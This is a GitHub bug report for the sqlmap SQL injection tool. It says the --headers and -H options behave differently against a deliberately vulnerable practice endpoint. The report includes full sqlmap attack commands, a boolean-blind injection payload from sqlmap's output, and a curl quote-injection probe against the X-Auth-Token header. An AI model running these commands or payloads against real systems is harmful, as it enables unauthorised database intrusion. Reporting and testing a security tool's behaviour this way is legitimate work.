8000 Sqlmap behaves differently with --headers and -H params with the same values · Issue #5908 · sqlmapproject/sqlmap · GitHub
[go: up one dir, main page]
Skip to content
Sqlmap behaves differently with --headers and -H params with the same values #5908
New issue
New issue
Closed
Closed
Sqlmap behaves differently with --headers and -H params with the same values#5908
Labels
bug report
@abright25

Description

@abright25
abright25
opened on Jun 10, 2025

Describe the bug
Running sqlmap with --headers and -H parameters gives us different output albeit same header values are provided

To Reproduce
1. Run 'sqlmap -v 3 --level 5 --risk 3 -u https://pentest-ground.com:9000/widget -X POST --headers="Content-Type: application/json\r\nX-Auth-Token: b191106ea2a7cc74b713e467a4986599*" --data="{\"name\": \"widget1\"}" --ignore-code '*' -b --batch --technique=B'
2. See in the logs
[WARNING] (custom) HEADER parameter 'X-Auth-Token #1*' does not seem to be injectable

and no issues found

Expected behavior

Running the same command, but now specifiying parameters separately, with -H:

sqlmap -v 3 --level 5 --risk 3 -u https://pentest-ground.com:9000/widget -X POST -H "Content-Type: application/json" -H "X-Auth-Token: b191106ea2a7cc74b713e467a4986599*" --data="{\"name\": \"widget1\"}" --ignore-code '*' -b --batch --technique=B

Gives us output:

[INFO] heuristic (basic) test shows that (custom) HEADER parameter 'X-Auth-Token #1*' might be injectable (possible DBMS: 'SQLite')
...
[INFO] (custom) HEADER parameter 'X-Auth-Token #1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --code=401)    
....
sqlmap identified the following injection point(s) with a total of 1663 HTTP(s) requests:
---
Parameter: X-Auth-Token #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: b191106ea2a7cc74b713e467a4986599' OR NOT 9726=9726-- rwlw
    Vector: OR NOT [INFERENCE]
---

Since all headers still have the same values, it is expected that both commands will produce 1 boolean based vulnerability.
Please notice that we explicitly specify with "*" asterisk injection point for the sqlmap.

Running environment:

Target details:

  • DBMS [sqlite3]
  • SQLi techniques found by sqlmap [only boolean based]
  • WAF/IPS [not sure]
  • Relevant console output [nope]
  • Exception traceback [if any]

Additional context
Target details can be obtained here https://pentest-ground.com:9000/help
Tested endpoint is supposed to be boolean-based vulnerable. So no other techniques needed to verify.
Running all-techniques scan gives the same result (only 1 boolean-based vuln)
Vulnerable header is X-Auth-Token and can be verified with simple quote injection in value

 curl -k -X POST https://pentest-ground.com:9000/widget \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Accept: /" \
  -H "Accept-Language: en-US;q=0.9,en;q=0.8" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" \
  -H "Connection: close" \
  -H "Cache-Control: max-age=0" \
  -H "X-Auth-Token: THISISATOKEN'" \
  -H "Content-Type: application/json" \
  -d '{"name":"widget1"}'

It immediately throws sqlite3.OperationalError trace into output

Metadata

Metadata

Assignees

No one assigned

    Labels

    bug report

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    No 2C95 ne yet

    Development

    No branches or pull requests

    Issue actions
      0